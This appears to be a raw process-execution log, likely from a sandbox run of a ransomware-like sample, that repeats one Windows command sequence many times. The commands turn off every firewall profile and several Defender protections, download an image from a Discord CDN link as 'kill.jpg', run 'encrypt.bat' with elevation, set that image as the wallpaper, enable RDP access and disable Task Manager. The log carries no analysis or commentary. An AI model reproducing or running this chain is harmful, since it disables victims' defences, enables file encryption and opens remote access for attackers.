C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

